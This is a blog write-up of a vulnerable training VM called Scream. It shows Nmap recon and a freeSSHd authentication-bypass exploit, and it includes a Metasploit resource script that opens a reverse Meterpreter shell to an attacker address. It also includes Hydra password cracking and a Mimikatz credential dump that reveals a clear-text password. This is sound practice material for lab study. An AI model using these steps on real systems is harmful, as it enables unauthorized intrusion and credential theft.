Scream: Write-up

This post contains the steps to get a SYSTEM shell on the Scream VM.

This VM can be found here. Have a look to find even more VMs. But before starting the report, I'd like to congratulate g0tmi1k for his awesome tool: VulnInjector.

Ok, let's get into the write-up!

Host discovery

As always, we first need to find where the machine sits on our network. To do so, let's use Nmap's ping scan (-sP, spelled -sn in current Nmap versions):

nmap -sP 192.168.1.1/24

Fingerprinting

After getting the IP address (192.168.1.2), we need to fingerprint the services listening on it.

nmap -sV 192.168.1.2
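The two Nmap steps above, as an added example that is not part of the original post: a small POSIX shell helper that runs host discovery and service fingerprinting with grepable output (-oG) and parses it into one line per open port, so banners like the FTP and SSH ones that mattered here stand out at a glance. The scan functions need nmap installed; the parsers are plain awk and are exercised offline against a constructed sample (the host and the War FTP Daemon / WeOnlyDo sshd 2.1.3 banners come from the post, everything else in the sample is made up).

```shell
#!/bin/sh
# Added example for this write-up (not the author's code): Nmap host discovery
# and service fingerprinting, with grepable output parsed by awk.

# Pull the IP out of grepable "Host: <ip> ()<TAB>Status: Up" lines.
parse_up_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Parse grepable "Ports:" lines into "host port proto service version".
# Each entry has the shape  port/state/proto/owner/service/rpcinfo/version/
# and nmap replaces any "/" inside the version string with "|", so splitting
# on "/" is safe. Closed/filtered ports are skipped; an empty version prints "-".
parse_open_ports() {
    awk -F'\t' '
        /^Host:/ && $2 ~ /^Ports: / {
            split($1, h, " "); host = h[2]
            sub(/^Ports: /, "", $2)
            n = split($2, entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")
                if (f[2] != "open") continue
                version = (f[7] == "") ? "-" : f[7]
                printf "%s %s %s %s %s\n", host, f[1], f[3], f[5], version
            }
        }'
}

# Host discovery over a range (the post used -sP, now spelled -sn): prints live IPs.
discover_hosts() {
    nmap -sn -oG - "$1" | parse_up_hosts
}

# Service fingerprinting of one or more hosts, one open port per output line.
scan_services() {
    nmap -sV -oG - "$@" | parse_open_ports
}

# Constructed sample of `nmap -sV -oG - 192.168.1.2` output for offline use.
# The host and the FTP/SSH banners are the ones from the post; the rest is made up.
sample_grepable() {
    printf '# Nmap scan initiated (constructed sample) as: nmap -sV -oG - 192.168.1.2\n'
    printf 'Host: 192.168.1.2 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.2 ()\tPorts: 21/open/tcp//ftp//War FTP Daemon/, 22/open/tcp//ssh//WeOnlyDo sshd 2.1.3/, 80/open/tcp//http///\tIgnored State: closed (997)\n'
    printf '# Nmap done (constructed sample) -- 1 IP address (1 host up) scanned\n'
}

# Offline demo: `sh recon.sh demo` parses the constructed sample instead of scanning.
if [ "${1:-}" = "demo" ]; then
    sample_grepable | parse_up_hosts
    sample_grepable | parse_open_ports
fi
```

Against a live target the flow is `discover_hosts 192.168.1.0/24` followed by `scan_services 192.168.1.2`; the parsed lines are easy to feed into a grep for the banners you care about (here `WeOnlyDo` would have pointed straight at the SSH service).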

Fig. Nmap scan result

Since port 80 (HTTP) showed up in the scan report, I decided to scan it with Nikto.

Fig. Nikto report on port 80 (HTTP)

Nikto found no interesting files and no obvious vulnerability.

Then I started to check the FTP server, because its banner was "War-ftpd". I logged in as the anonymous user, but after a while I got blacklisted.

I guess the FTP server didn't appreciate my attempts to exploit War-ftpd flaws while I was also trying to crack the ftp account with Hydra.

And I got banned.

Fig. FTP connection timing out after getting blacklisted

The last service left was the SSH server, with the curious banner "WeOnlyDo sshd 2.1.3". Hmm, this unusual banner was interesting.

I decided to go further with the SSH service.

Exploitation

I started browsing the internet for sshd vulnerabilities on the Windows platform and found the freeSSHd Authentication Bypass Metasploit module. That fits the banner: freeSSHd is made by WeOnlyDo Software, which is why the server announces itself as "WeOnlyDo sshd".

Fig. Looking for a freeSSHd exploit

I decided to check it out. I knew there was an account called ftp, but that username didn't work.

Fig. Setting the payload for the freeSSHd exploit

Since the bypass only needs a valid username (the server accepts any public key for an existing account), I had the module try the usernames from the wordlist shipped with Metasploit.

And it worked!

Fig. Successful exploitation with the freeSSHd exploit
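The exploitation step as a Metasploit resource script, added here as an example and not taken from the original post. The module path and the USERNAME/USER_FILE options are from my memory of the freeSSHd auth-bypass module and should be confirmed with `show options`; the wordlist path is the Kali default and is an assumption, as is the attacker address used for LHOST. The target address is the one from the post.

```text
# freesshd.rc  --  run with: msfconsole -q -r freesshd.rc
# Added example; option names from memory of the module, check them with `show options`.
use exploit/windows/ssh/freesshd_authbypass
set RHOSTS 192.168.1.2
set RPORT 22
# The bypass only needs an existing username, so iterate over a wordlist
# instead of guessing one account (the post's "ftp" did not work).
unset USERNAME
set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
# Payload and listener (LHOST is an assumed attacker address).
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit
```

Every username in the file is tried with the bypass until one is accepted; because the SSH service runs as a Windows service, the session that comes back has SYSTEM privileges without any further privilege escalation.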

Thanks to this vulnerability, I got a Meterpreter session with SYSTEM privileges. Awesome!

Access Maintenance

We already had a SYSTEM session, but I was curious and wanted to practice with Mimikatz, a (security) tool developed by a French researcher, Benjamin Delpy, who has done some awesome work. In a few words, it lets you dump the credentials that Windows keeps in memory (in the LSASS process).

Loaded as an extension of our Meterpreter session, Mimikatz gave us the clear-text password: thisisaverylongpassword. And yes, it is.

Fig. Dumping passwords using Mimikatz

This was the first Windows VM I've tried here, and it was a great surprise. I learnt a few tricks, which was nice.
Hope you liked it, and good evening!

Copyright © 2017 - Paul A. (PaulSec). Powered by Octopress